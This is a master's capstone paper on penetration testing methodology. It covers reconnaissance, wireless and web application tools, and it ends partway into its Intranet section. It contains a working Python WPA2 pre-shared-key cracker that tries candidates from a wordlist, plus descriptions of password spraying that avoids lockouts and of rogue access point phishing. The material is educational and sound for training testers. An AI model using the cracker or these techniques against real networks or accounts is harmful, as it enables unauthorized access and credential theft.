Penetration Testing Methodologies by Mathew Stuart A Capstone Project Submitted to the Faculty of Utica College May 2020 in Partial Fulfillment of the Requirements for the Degree of Master of Science in Cybersecurity


Penetration Testing Methodologies

by

Mathew Stuart

A Capstone Project Submitted to the Faculty of

Utica College

May 2020

in Partial Fulfillment of the Requirements for the Degree of

Master of Science in Cybersecurity


© Copyright 2020 by Mathew Stuart

All Rights Reserved


Abstract

Given the rising trend in security breaches among organizations worldwide, cybersecurity has increasingly become an important role in the public and private industry sectors. In addition, the cybersecurity workforce gap has left many organizations without qualified professionals to secure their data. There is a growing need to educate and employ cybersecurity professionals in both commercial organizations and government.

The main barriers to beginning a career in cybersecurity are gaining advanced and relevant knowledge and experience in cybersecurity. Knowledge can be difficult and time consuming to obtain, and training can cost money. Because of the barriers to beginning a career in cybersecurity, a single source of information that leads to knowledge and experience in cybersecurity is valuable.

The purpose of this research was to develop a cybersecurity penetration testing methodology template for use by aspiring cybersecurity professionals to practice penetration testing and develop a personalized methodology. What are the common penetration testing tools and methods for attacking a network or environment from the Internet? What are the common penetration testing tools and methods for attacking a network or environment from the Intranet? What are the common penetration testing tools and methods for attacking web applications? This research is important because penetration testing experience leads to advanced knowledge in cybersecurity, which is an advantage when beginning a career in cybersecurity. Understanding cybersecurity concepts through a security analysis provides a tester with conceptual knowledge and hands-on experience. Through the process of developing a penetration testing methodology, an aspiring cybersecurity professional will learn about cybersecurity tools, technologies, and procedures.

Keywords: Duane Corbo, cybersecurity, cyber operations, penetration security, testing


Acknowledgments

My first acknowledgment is to Professors Krystina Horvath and Anna Ragno for their guidance and assistance throughout this project. Their feedback has been valuable and educational throughout this project. I would also like to thank family, especially my wife and mother, for all their support throughout these past 7 years as I worked and went to school at the same time. If not for their support and encouragement, I may not have reached this point in my education and career. I would also like to thank Utica College for providing the technical and hands-on education that I was searching for. I learned a great deal from every course, and I was able to utilize that knowledge to gain employment in the cybersecurity industry. Lastly, I would like to thank Michael Denny for taking the time to lend his experience and expertise and be the second reader of this paper.


Table of Contents

List of Illustrative Materials ........ vi
Statement of the Problem ........ 1
Literature Review ........ 7
    Introduction to Penetration Testing ........ 7
    Intelligence Gathering ........ 8
    Wireless Networks ........ 10
    Web Application Testing ........ 14
    Intranet ........ 18
        Scanning and discovery ........ 18
        Exploitation and gaining access ........ 22
        Persistence and spreading ........ 24
        Data gathering and extraction ........ 29
        Covering tracks ........ 31
Discussion of the Findings ........ 31
    Wireless Tool Benefits ........ 32
    Web Application Testing Results ........ 32
    Intranet Security Testing Results ........ 35
    Commonalities ........ 43
Conclusion ........ 45
References ........ 48
Appendix A ........ 54
Appendix B ........ 56


List of Illustrative Materials

Figure 1. Nikto Options 1 ........ 56
Figure 2. Nikto Options 2 ........ 57
Figure 3. ARP Poisoning Before and After ........ 58
Figure 4. Enum4Linux Help Page Output ........ 59
Figure 5. Syntax for Metasploit ........ 60
Figure 6. Spear Phishing Model: Targeted Cyber Attack ........ 61
Figure 7. Nikto Command and Output From a Generic Scan ........ 33
Figure 8. ZAP Automated Scan Configuration Screen ........ 34
Figure 9. ZAP Automated Scan Results ........ 35
Figure 10. Nmap device enumeration command ........ 36
Figure 11. How to Start a Scan in OpenVAS ........ 37
Figure 12. Results From OpenVAS Scan ........ 38
Figure 13. Enum4linux LDAP Output ........ 39
Figure 14. Enum4linux Users Output ........ 40
Figure 15. Enum4linux Password Policy Output ........ 41
Table 1. Example of Basic Nmap Command Options ........ 54
Table 2. Nmap Stealth Scanning Options ........ 54


Statement of the Problem

The purpose of this research is to review different penetration testing methodologies and discuss the advantages and disadvantages of each methodology in order to provide a best practice method for attacking networks. The networks and environments that will be explored are the Intranet, Internet and web applications. This will focus on information at a beginner’s level, thus creating a template that can be used as a baseline for creating a more advanced and personalized methodology as a user’s skills and knowledge increase over time and through practice.

In order to provide best practices, the following questions will be answered: what are the common penetration testing tools and methods for attacking a network or environment from the Internet? What are the common penetration testing tools and methods for attacking a network or environment from the Intranet? What are the common penetration testing tools and methods for attacking web applications?

In the realm of cybersecurity, there are two main roles: red team and blue team. Blue teams are the teams of cybersecurity professionals who defend an environment from compromise. In the event of a compromise, the blue team responds to those incidents for the purposes of both minimizing the degree of compromise and gaining knowledge regarding the attack. Blue teams also use data gathered about an attacker for investigations by either their organization and/or law enforcement.

A red team is a team of cybersecurity professionals whose purpose is to attack an organization’s environment for the purpose of authorized security testing, audit and analysis. Red teams only perform offensive actions at the request of those whom they are testing; therefore, offensive testing is always agreed upon beforehand, with strict rules for the teams to follow. These rules include a list of acceptable and unacceptable actions, and the scope in which the attack will be conducted (NIST, 2019a).

A blue team member or member on the defensive side of cybersecurity needs to know more than just how to utilize tools to defend a network. A well-rounded security professional also needs to understand how to perform offensive operations. It is imperative that cybersecurity professionals understand how an attacker can penetrate an environment, which will inform the cybersecurity professional how to defend against these types of attacks (NIST, 2019b).

Penetration testing (Pen testing) can help test the blue team’s incident response skills and methods. A penetration test also helps a blue team identify an organization’s vulnerabilities and allows the blue team to make modifications to systems and processes. The process of penetration testing also promotes a proactive approach to blue teaming. If a blue team knows that an environment will be the target of a pen test, they are likely to perform their own ad-hoc penetration test to identify and remediate vulnerabilities ahead of time. This is often the case when penetration tests are required for regulation and compliance purposes (Sanabria, 2018).

According to the Offensive Security organization (2019), offense is the best defense. The only way to be confident that risk mitigation strategies protecting a company against cyber-attacks will be effective is through simulation, or proactively testing security measures before a real intruder does. By encouraging students to put themselves in the shoes of a hacker by utilizing the same tools and techniques, Offensive Security is leveling the playing field for defenders (Offensive Security, 2019).

In order to secure an environment, it is critical that a cybersecurity professional understand how a potential attacker would attempt to penetrate an organization’s environment. The need for offensive security knowledge grows as the number of successful cyber-attacks increases each year. The number of successful security breaches in the U.S. for 2016 was 1,091, which was 40% more than the 780 breaches in 2015. Similarly, there were 1,579 data breaches in the United States in 2017, which was a 44.7% increase from 2016 (Identity Theft Resource Center, 2018).

The shock of data breach frequency is compounded by the average cost of a data breach in the United States. IBM’s report on data breaches states that the average cost of a data breach in the United States is $8.19 million per breach (IBM, 2019). With the risk of an organization losing millions of dollars, and the possibility of millions more in lost revenue due to a damaged reputation as the result of a data breach, organizations are on the lookout for qualified cybersecurity professionals to protect their environments.

There is currently a severe shortage of qualified cybersecurity professionals worldwide. A study conducted by Cybersecurity Ventures states “A 2016 skills gap analysis from ISACA estimated a global shortage of 2 million cybersecurity professionals by 2019 (a half-million more than Symantec’s prior estimate), according to the United Kingdom House of Lords Digital Skills Committee” (Morgan, 2017). In the United States, there was a shortage of about 314,000 cybersecurity professionals as of January 2019 (Crumpler & Lewis, 2019). The data breach frequency, costs to an organization per data breach, and the large cybersecurity workforce gap all outline the need for more cybersecurity professionals. An increase in cybersecurity professionals to fill the workforce gap will also increase the security posture of organizations in the United States and around the world.

One of the questions regarding the cybersecurity workforce gap is why the gap exists in the first place. The International Information Systems Security Certification Consortium, also known as ISC2, performed a study in 2018 regarding the mentioned workforce gap and it showed that “Despite [cybersecurity] professionals looking to shift priorities, as well as other concerns and challenges, 68% of respondents say they are somewhat or very satisfied with their jobs” (International Information Systems Security Certification Consortium, 2018).

With most cybersecurity professionals satisfied with their jobs, the question remains as to why more people are not filling the workforce gap. The International Information Systems Security Certification Consortium (ISC2) also investigated this issue. According to ISC2’s survey, 34% of people surveyed do not know which career path opportunities lead to a role in cybersecurity, 32% of organizations do not know about cybersecurity skills, and the same percentage of people surveyed cannot afford certification training and/or the certifications themselves. Twenty-eight percent of people surveyed cannot afford the formal education to prepare them for a career in cybersecurity, and 26% of people surveyed said they do not have enough experience in cybersecurity to get a job in the industry. This is a problem because 49% of organizations surveyed in the same survey stated that the most important qualification for employment is relevant cybersecurity work experience, while 40% of organizations stated that extensive cybersecurity work experience is the most important qualification for employment (International Information Systems Security Certification Consortium, 2018). It is difficult to begin working in the cybersecurity industry if one does not have prior cybersecurity experience.

Between the time it takes to learn cybersecurity skills, the costs of training, and the requirement for prior cybersecurity experience, it is not surprising that there is such a large workforce gap. The lack of quality, open-source training materials that cover the steps needed to learn cybersecurity, specifically offensive security, is the main issue. Offensive security is so important because the previously mentioned ISC2 survey reported that 47% of organizations named advanced cybersecurity concepts as the most important qualification for employment. Another 40% believe relevant cybersecurity experience is the most important factor for employment, meaning that 87% of organizations require prior experience for employment (International Information Systems Security Certification Consortium, 2018).

Offensive security knowledge falls under advanced cybersecurity concepts and relevant cybersecurity knowledge, making penetration testing and red team skills the most coveted skill set. Gaining knowledge and experience in the cybersecurity field can occur at home during a person’s spare time. There are ways of creating home cybersecurity testing labs that allow a person to test and practice what they learn. In one example, a cybersecurity student, Vitaly Ford, posted instructions on how to create such a lab environment using virtual machines. Ford’s blog post also provides links to resources like virtual machine images that can easily be used with virtual machine hosting software, also known as a hypervisor. An example of a hypervisor is VirtualBox. Ford’s directions on first steps are to learn how to install a virtual machine (and a hypervisor), which is typically performed in Microsoft Hyper-V, Oracle VirtualBox, or VMWare Workstation/Fusion. In addition, one can begin thinking about developing a networking diagram that will help a pen tester stay on track once the pen tester installs virtual machines and connects them together (Ford, 2017).

Ford’s steps are one option, among several, to gain hands-on experience and cybersecurity knowledge. Hands-on penetration testing experience is possible through the utilization of penetration testing environments provided by the hosts of hackthebox.eu. If a user can gain credentials and create an account in hackthebox.eu, that user is able to utilize the OpenVPN config file for their Hack the Box account, which provides access to a testing network. This would allow the user to perform attacks against pre-setup machines in the environment and, thus, test what was learned in regard to penetration testing. Hack the Box is a website that allows the user to test their pen testing skills and share their knowledge and methods with the rest of the hacker community (Hack the Box, 2019). The pre-setup machines in Hack the Box’s environment range in difficulty in gaining user and root credentials. Once a tester gains one or both credentials, they submit the credentials to Hack the Box, which awards points for correct credentials. Practicing penetration testing with the easier machines is often a good start and a great learning experience.

This paper addresses the lack of penetration testing methodology templates that beginners in the field of cybersecurity should utilize to develop a personalized penetration testing method that works best for them. There is a lack of cybersecurity learning materials available for new professionals that overview how to use different tools and how to utilize tools at each step of a penetration test. In search of advanced cybersecurity conceptual knowledge, the main barriers to entering the cybersecurity field are time, money and a lack of cybersecurity experience. A penetration testing template would assist an information technology professional in gaining cybersecurity knowledge and experience.

Those with little to no cybersecurity experience who wish to perform penetration tests tend to research multiple online sources in order to gain the knowledge they need. Instead, there should be a single template for penetration testing best practices with tool syntax and examples which provide a starting point for beginners to develop their own pen testing methodology.

The primary audience who might benefit from this research are those who wish to gain penetration testing knowledge and experience, and those who wish to learn how a pen test is performed from beginning to end. It also includes steps on how to discover hosts, find vulnerabilities, exploit example vulnerabilities, maintain persistence on a machine, exfiltrate data and erase evidence of an attack to cover the attacker’s tracks. The mentioned penetration testing steps include syntax for the tools covered in this paper, and best practices on how to use those tools.

Literature Review

Introduction to Penetration Testing

There are three different types of penetration tests: black box, white box, and grey box. The type of penetration test that is performed depends on the amount of information that is provided to the tester before testing begins. Black Box testing is conducted when the tester is given no information about an organization’s network or code. White Box testing is when the tester is given full knowledge of an organization’s network or source code. Grey Box testing is a combination of White and Black Box testing, meaning that the tester has limited knowledge of the network or source code (Khan & Khan, 2012). The seven main phases of a penetration test are as follows:

• Discovery
• Enumeration/Info Gathering
• Exploitation
• Privilege escalation
• Persistence/Maintaining Access
• Covering Tracks
• Documentation/Reporting

(Ali, Allen, & Heriyanto, 2014).

In the book Advanced Penetration Testing for Highly-Secured Environments (2016), the authors explain the Penetration Testing Execution Standard (PTES) and outline the standard’s structure. The seven sections of the PTES are pre-engagement interactions, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting. The PTES explanation does not include a technical guide for the standard, but it does reference the URL http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines, which is a technical guide for the PTES. In the PTES technical guideline, the steps are broken down into smaller steps with technical information, but the core of the guideline is the same as the guideline found in Advanced Penetration Testing for Highly-Secured Environments (2016) (Allen & Cardwell, 2016).

Standards in penetration testing are often vague, general and procedural in nature, as opposed to being technical, which provides specific details. A commonality throughout penetration testing is the use of tools and toolsets to perform those tests. Open-source tools are most often used to perform penetration tests. Penetration testers use stand-alone tools and toolsets. These toolsets are chosen by their effectiveness and the tester’s familiarity with the tool. If the tester is not familiar with their tools, the test will not be effective. There are many open-source and paid tools, but testers need to choose their toolsets to fit the needs of the test. As an example, in an application security test, Aircrack-ng would not normally be necessary because Aircrack-ng was made for wireless network testing and the test is performed on a software’s security and not the security of the network. The same could be said if the situation was reversed, where a static code analyzer would not be required for a network penetration test. Ensuring the toolset matches the test and the penetration tester is familiar with their toolset is easily the most important aspect of a penetration test (Velu, 2017, pp. 201-206).

Intelligence Gathering

The discovery phase begins with intelligence gathering and the discovery of devices that could be compromised. The three intelligence gathering methodologies are open source intelligence (OSINT), cyber intelligence (CYBINT) and human intelligence (HUMINT). Cyber intelligence involves finding information about the target on the Internet, which is a subset of open source intelligence. This means finding intelligence via an open source tool or platform. Another intelligence gathering location is online social networks (OSNs). OSNs are part of CYBINT, and for good reason, as OSNs commonly have a wealth of data on individuals within a company and on the organization itself (Sood & Enbody, 2014).

Human intelligence occurs when an attacker acquires information about the target by analyzing responses from people through direct interaction. This can include phishing emails or physically posing as someone else to trick the target into providing the attacker information. These practices are also known as social engineering (Sood & Enbody, 2014). Social media has changed open source intelligence in a profound way. Through OSN, intelligence on both individuals and organizations is discoverable through social media accounts such as Facebook, YouTube, Instagram, Snapchat, and Twitter. When reviewing the target’s social media posts, it is possible to gather the target’s location during certain times of day, friend lists, liked pages, and group associations. The information gathered using OSN provides the attacker with an overview of what the target likes and what kind of information they are most receptive to. This can give an attacker the information needed to manipulate a user through social engineering as part of an attack against the specific user or an organization (Bahybars-Hawks, 2015).

OSINT also includes discovering publicly facing devices of a target organization. This could include websites, Internet accessible servers and/or Internet accessible networking equipment. The target discovery phase mostly entails identifying the status of a target’s network and operating system (OS), and mapping out the organization’s information technology infrastructure. This provides the penetration tester with a better understanding of the technologies or devices used within an organization and may further help the tester in enumerating services. By utilizing tools in Kali Linux, the tester can determine what hosts are live on a network and which operating systems are running on the local hosts, and will be able to characterize each device according to its role. The tools in Kali Linux often utilize active and passive detection techniques in addition to network protocols, which can be manipulated in various ways to gather information from the OS and running services (Ali, Allen, & Heriyanto, 2014).

Wireless Networks

When a penetration test involves compromising a wireless network, it can end up being the key to compromising an entire company. Some tools and toolsets in Kali Linux are useful when attempting to test a wireless network’s security. Two of the most widely used toolsets are Kismet and Aircrack-ng.

Kismet can be used as a wireless detector, sniffer, and intrusion detection system. Kismet can detect and sniff the name of the wireless network along with its broadcast ID (BSSID), the channel it is broadcasting on, the MAC address of the wireless access point (WAP), and the MAC address clients use to connect to the wireless network. Kismet supports some plugins that expand the wireless protocols that can be sniffed (Beggs, 2017). It can also sniff the other Institute of Electrical and Electronics Engineers (IEEE) Wi-Fi standards 802.11a, 802.11b, 802.11g, and 802.11n traffic. These different IEEE 802.11 standards are wireless local area network (WLAN) standards that, among other features, denote the speed and security of wireless traffic. The latest IEEE standard for wireless networks is 802.11ay, which allows a possible 20 gigabits per second download and upload speed (IEEE, 2019).


Kismet performs reconnaissance by placing the attacker’s wireless network interface card (WNIC) in promiscuous mode and activating Kismet, which will capture packets transmitted over the air and discover the different SSIDs in the area, along with cell towers for mobile data traveling through the air. The information gathered by Kismet is useful in different ways. For example, knowing the wireless security protocol will allow the attacker to determine the appropriate decryption module in Aircrack-ng to extract authentication information. Knowing the MAC address allows the attacker to attempt to perform different types of attacks. For example, a tester can perform an Omerta attack if the wireless access point (WAP) is an unpatched Aruba WAP. Kismet obtains a variety of information when sniffing the 802.11 standard spectrum (Beggs, 2017). “Omerta is an 802.11 DoS tool that sends disassociation frames to all stations on a channel in response to data frames. The Omerta attack is characterized by disassociation frames with a reason code of 0x01” (Aruba Networks, 2019).

Another well-known open-source wireless security tool is Aircrack-ng. The toolset specializes in wireless security testing and is comprised of an array of tools that can perform almost any task required during a wireless security penetration test. The following is a list of each tool in the Aircrack-ng suite and its use:

• Airbase-ng – creates rogue access points.

• Aircrack-ng – cracks and recovers WEP keys and WPA/WPA2 pre-shared keys.

• Airdecap-ng – decrypts captured WEP and WPA/WPA2 traffic once the key is known.

• Airdecloak-ng – removes WEP cloaking, a technique some vendors use to fool WEP cracking tools, from a capture file.

• Aireplay-ng – injects frames to generate traffic for attacks, including deauthentication and ARP request replay.

• Airmon-ng – places the WNIC into monitor mode so that all 802.11 frames on the channel can be captured.

• Airodump-ng – monitors and sniffs 802.11 traffic, listing access points and stations and writing the captured frames to a file.

• Airodump-ng-oui-update – updates the Organizationally Unique Identifier (OUI) database used to map MAC addresses to vendors.

• Airolib-ng – maintains a local database of ESSIDs, passphrases and precomputed PMKs to speed up cracking.

• Airserv-ng – a wireless card server that lets other programs, including programs on other hosts, use the WNIC over a TCP connection.

• Airtun-ng – creates virtual tunnel interfaces.

• Besside-ng – an automated WEP and WPA attacking tool that cracks all WEP-protected networks the WNIC can see and records all WPA handshakes.

• Easside-ng – sets up communication via a virtual WEP-protected AP without the WEP key.

• Packetforge-ng – creates forged wireless packets for use in other attacks.

• Tkiptun-ng – can inject a few frames into a WPA TKIP network with quality of service (QoS) enabled.

(Fadyushin & Popov, 2016, pp. 154-159).

Penetration testers can crack a Wi-Fi Protected Access 2 (WPA2) pre-shared key by using Airmon-ng to place the interface into monitor mode, so that the interface can capture all 802.11 frames on the channel. The next step is to run Airodump-ng, which lists the access points and their clients in a table and writes the captured frames to a file. The Aireplay-ng tool then sends forged deauthentication frames to a connected client, which forces the client to re-authenticate to the WAP. This allows Airodump-ng to capture the WPA four-way handshake as it travels over the air. Aircrack-ng then recovers the key from the handshake by trying candidate passphrases from a wordlist until one reproduces the captured handshake; nothing is decrypted, and a passphrase that is not in the wordlist will not be found. The recovered key lets the tester authenticate to the wireless network (Fadyushin & Popov, 2016).
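The handshake cracking step above, written out as an added Python example (not code from this capstone or from the Aircrack-ng project) so that the arithmetic aircrack-ng performs is visible: the PMK is PBKDF2-HMAC-SHA1 of the passphrase and SSID, the PTK is expanded from the PMK with the two MAC addresses and the two nonces, and the first 16 bytes of the PTK (the KCK) authenticate the EAPOL message. The SSID, MAC addresses, nonces, the message 2 frame and the wordlist are all constructed here, and the "captured" frame is produced by signing the constructed frame with the real passphrase; in a real run these values come from the .cap file written by airodump-ng.

```python
import hashlib
import hmac

# Constructed lab values (assumed, not a real capture): in practice the SSID, BSSID,
# station MAC and both nonces are read from the airodump-ng capture file.
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("0013ef0a1b2c")       # BSSID of the access point
CLIENT_MAC = bytes.fromhex("3c5a3700aa11")   # station that was deauthenticated
ANONCE = bytes(range(32))                    # nonce from EAPOL message 1 (AP -> station)
SNONCE = bytes(range(100, 132))              # nonce from EAPOL message 2 (station -> AP)
MIC_OFFSET = 81   # EAPOL header (4) + key descriptor fields that precede the MIC (77)


def pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: four HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def kck(pmk_bytes: bytes) -> bytes:
    """Pairwise transient key expansion; the first 16 bytes are the key confirmation key (KCK)."""
    data = (min(AP_MAC, CLIENT_MAC) + max(AP_MAC, CLIENT_MAC)
            + min(ANONCE, SNONCE) + max(ANONCE, SNONCE))
    return prf_512(pmk_bytes, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck_bytes: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed)[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck_bytes, zeroed, hashlib.sha1).digest()[:16]


def build_msg2() -> bytes:
    """Constructed EAPOL-Key message 2 with an empty MIC field (95-byte body, no key data)."""
    header = bytes([0x02, 0x03]) + (95).to_bytes(2, "big")   # 802.1X version, EAPOL-Key, body length
    body = (bytes([0x02])                       # descriptor type: RSN
            + bytes([0x01, 0x0a])               # key info: MIC set, pairwise, descriptor version 2
            + (16).to_bytes(2, "big")           # key length
            + (1).to_bytes(8, "big")            # replay counter
            + SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, key ID
            + b"\x00" * 16                      # MIC, filled in by the station
            + (0).to_bytes(2, "big"))           # key data length
    return header + body


def capture_msg2(passphrase: str) -> bytes:
    """Stand-in for the sniffed frame: the station signs message 2 with the KCK from the true PSK."""
    frame = build_msg2()
    mic = eapol_mic(kck(pmk(passphrase, SSID)), frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_psk(captured_msg2: bytes, wordlist):
    """What `aircrack-ng -w wordlist` does: derive the KCK for each candidate, recompute the
    MIC and compare it with the captured one. Nothing is decrypted; a match means the
    candidate is the pre-shared key."""
    observed = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if hmac.compare_digest(eapol_mic(kck(pmk(candidate, SSID)), captured_msg2), observed):
            return candidate
    return None


CAPTURED = capture_msg2("Winter2019")    # constructed; plays the role of the .cap file
WORDLIST = ["password", "Summer2019", "corpguest1", "Winter2019", "letmein"]

if __name__ == "__main__":
    print("recovered PSK:", crack_psk(CAPTURED, WORDLIST))
```

The 4096-round PBKDF2 per candidate is what makes WPA2-PSK cracking slow and why airolib-ng precomputes PMKs per ESSID: the PMK depends only on the passphrase and SSID, so it can be computed once and reused against every handshake captured from that network.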

Cracking captured authentication material is part of most penetration testing processes. Wireless network handshakes are one example, and password hashes taken from compromised machines are another. The password cracking section of the PTES describes how to attack the different wireless security protocols. For WPA-PSK networks, the pre-shared key can be brute-forced offline. WPA is an acronym for Wi-Fi Protected Access and PSK stands for Pre-Shared Key. To do this, the four-way authentication handshake between a client and the WAP must first be captured with a tool such as Wireshark or Airodump-ng. The handshake is not decrypted: it carries a message integrity code computed from a key derived from the passphrase and the SSID, so the cracker derives that key for each candidate passphrase in a wordlist and checks whether it reproduces the captured integrity code. The Penetration Testing Execution Standard notes that the Aircrack-ng tool suite is made specifically for this task and is the standard open source tool for cracking captured wireless authentication (Pen test-Standard, 2012).

Regarding password cracking, John the Ripper (JTR) is an open source tool that cracks hashes to reveal passwords. JTR is commonly used against Windows LM and NTLM hashes, but the jumbo version also supports Kerberos tickets, the password hashes used by Linux and macOS, and many other formats, including captured WPA/WPA2 handshakes (WEP key recovery is a different problem, handled by Aircrack-ng rather than by a hash cracker). JTR does not use rainbow tables; it hashes candidate passwords taken from a wordlist (optionally mangled by rules) or generated by brute force in its incremental mode, and compares each result with the captured hash. Rainbow tables are a separate precomputation technique in which chains of hashed and reduced values are stored in advance to trade disk space for cracking time; they only work against unsalted hashes such as LM and NT hashes (Fadyushin & Popov, 2016).

As mentioned previously, another way to attack a wireless network is to pose as the wireless network itself. This is accomplished by performing a modified combination of a man-in-the-middle and phishing attack called AP phishing. AP phishing, or access point phishing, is an attack that involves a rogue access point that serves a captive web portal asking users for sensitive information. If performed correctly, the users will not realize they are being phished, assuming they normally enter credentials in a web portal to access the network. This works best when spoofing access points in public areas such as Starbucks, where captive portals are expected. Airbase-ng from the Aircrack-ng suite creates the rogue access point, and Airpwn-ng, a separate tool often used alongside the suite, injects the phishing content into the clients' traffic (Fadyushin & Popov, 2016).

Web Application Testing

Referring to the Open Web Application Security Project (OWASP), the OWASP penetration testing methodologies page of its website lists reasons for performing web application penetration tests and references the Penetration Testing Execution Standard (PTES). OWASP also refers to the Payment Card Industry Data Security Standard (PCI DSS) penetration testing requirement and offers guidance on the framework for compliance testing. The page also outlines NIST Special Publication 800-115 (the Technical Guide to Information Security Testing and Assessment) and the Information Systems Security Assessment Framework (ISSAF), which is a separate methodology rather than part of NIST 800-115. Other methodologies outlined are the Open Source Security Testing Methodology Manual (OSSTMM) and the FedRAMP Penetration Test Guidance. This is important for web application penetration testing, as there is always a reason for a test, and regulatory compliance is often that reason. Understanding the compliance standards that drive web application penetration testing is critical to performing the correct test for the organization (OWASP, 2019).

The Zed Attack Proxy (ZAP) was developed by the OWASP as an open-source tool for

the sole purpose of finding web application vulnerabilities. The tool has a variety of functions

allowing automatic and manual scanning of an application. The OWASP ZAP user guide on

Github contains an explanation for the different settings that the ZAP tool offers (Psiinon, 2015).


ZAP has multiple modes that serve different purposes. Safe mode tells the tool to refrain from any potentially dangerous actions, such as active scanning, that could hinder the performance of a web application. Protected mode is the next level up from safe mode and permits potentially dangerous actions only against URLs that are in scope. Standard mode is the default when a tester installs and opens the tool, and allows the tester to perform whichever tests they want against any site. Lastly, attack mode tells the tool to actively scan each in-scope URL as soon as it is discovered, running all enabled tests against it (Psiinon, 2015).

There are several other tools available to assist a security analyst throughout the process of performing a web application penetration test. One such tool is Nikto, which is an open source web server scanner that checks for known URL paths, index pages, HTTP server options, the server OS, and web hosting software. Because the program reports the paths and pages it finds, not every item in its output is a vulnerability, and the results need manual review. The tool makes no attempt at stealth, so it can also be used to test whether intrusion detection systems (IDS) and/or intrusion prevention systems (IPS) raise alerts. In Kali Linux, the command 'nikto -Help' shows the options for scanning, output format, display, configuration, authentication, and other features, as shown in Figures 1 and 2 in Appendix B (Sullo, 2019).

A popular, effective and widely used web application security testing tool is Burp Suite, an intercepting proxy that lets a user capture the HTTP and HTTPS traffic between the browser and the web application. The tool allows for security testing by modifying those captured requests and responses, which carry the parameters, cookies and other data the web application relies on. Intercepting traffic is performed by configuring the attacker's browser to use Burp Suite as its proxy (for HTTPS, Burp's CA certificate is also installed in the browser so that the proxy can decrypt the traffic) and then activating Burp Suite's intercept mode, so that each HTTP(S) request is held and displayed as plain text before it reaches the web server, and each response before it reaches the browser (Sharma, 2017).

One use case for Burp Suite during security testing is capturing the POST requests for a successful and a failed login and using them in conjunction with the Hydra tool, which performs credential testing. A POST request is sent to the web application when a user enters information on the website and submits it, for example by clicking login after entering a username and password. The process is to take the raw request from Burp Suite (the URL, the form field names, and a string in the response that distinguishes a failed login from a successful one) and give it to Hydra along with a username file and a password file, so that Hydra can report which username and password combinations authenticate successfully. This is far faster than manually testing usernames and passwords in the browser (Sharma, 2017).

Outlook Web App (OWA) is a popular target for password spraying attacks because OWA authenticates against the user's domain credentials. One of the issues in password guessing is account lockout, which occurs when a password has been entered incorrectly too many times within the lockout observation window and the account is locked out, so the attacker can no longer try passwords indefinitely. Password spraying works around this limitation by trying one strategically chosen password across all the accounts of an organization's domain before moving to the next password, so that each account accumulates only one failed attempt per round and stays below the lockout threshold (Najera-Gutierrez & Ansari, 2018).

Before performing the password spray, it is important to obtain the username or email address format of the organization, which is usually discovered during OSINT and HUMINT. When choosing the password for a spray against OWA, it is important for the tester to understand common password patterns. An example of a commonly used password is the current season and the year, such as Winter2019 (Najera-Gutierrez & Ansari, 2018). This ten-character password contains uppercase letters, lowercase letters and numbers, so it satisfies a typical complexity policy, and most organizations only require passwords to be eight characters long.

In order to perform the attack, the attacker needs to visit the OWA login page to attempt

and fail a login while capturing the POST request. The captured request is then forwarded to

Burp Suite’s Intruder functionality where the attacker uses the attack type of ‘sniper’ and

specifies the type of payload they want to use. The payload is the username or email because that

is the only thing that will change during the attack since the same password will be used against

all accounts to reduce the risk of account lockouts (Najera-Gutierrez & Ansari, 2018).

Once the password is entered as the fixed part of the request, the attacker imports the list of possible usernames or email addresses found and/or generated during OSINT and HUMINT as the Intruder payload. In some circumstances, the tester must configure Burp Suite to follow redirects and to process the cookies set during them, because OWA redirects after login and a successful attempt can be told apart from a failed one only by the resulting page or the session cookie issued. Once these settings are in place, the attack can be launched. Cookies are stored by the user's browser and contain the session ID, user ID and other text. Websites use cookies to maintain a session with a browser so that the user does not have to re-authenticate as other URLs are loaded (Najera-Gutierrez & Ansari, 2018).

Most web applications are backed by a relational database queried with Structured Query Language (SQL). SQL is a standard query language, implemented by Microsoft SQL Server, MySQL, PostgreSQL, Oracle and others, that is used for database communication and queries. Because web applications build SQL queries from user input, the SQLMap tool is included in the Kali Linux distribution by default and is the most popular tool for finding and exploiting SQL injection in web applications. SQLMap supports the major database management systems and offers enumeration, fingerprinting, and takeover options when a vulnerability allows. The specific tasks the tool can perform are listed on its official GitHub page. The range of options and capabilities that the tool offers makes it a great tool to use during web application security testing, and it should be included in any penetration tester's tool suite (Stamparm, 2014).

Intranet

Scanning and discovery. The Internet and an intranet are two different types of networks. The Internet is a computer communications network that connects servers and computers around the world (Merriam-Webster, 2019). An intranet connects computers and servers within one or several local area networks (LANs) belonging to an organization; its hosts use private addressing and are not directly reachable from the Internet, even though the organization itself connects to the Internet through an Internet Service Provider (ISP).

When a tester has access to a target organization’s Intranet, they generally can establish a

network connection to other network connected devices on that organization’s Intranet. Access

to an organization’s Intranet can occur in a couple of different ways. One way to get a network

connection is to establish a physical connection to the network using an ethernet cable to an

ethernet port in the office of the organization. Another way is to get wireless network access

through a connection to the wireless access point (Fadyushin & Popov, 2016).

Once the tester is on the network, discovery of devices on the network and enumeration of those devices are the next steps in performing a penetration test. Reconnaissance is part of the preparation phase, in which the tester gathers as much information as possible about the target before launching an attack. During the reconnaissance phase, the tester draws on different sources of intelligence to learn more about the target organization. The phase may also involve internal and/or external network scanning (EC-Council Press, 2017).

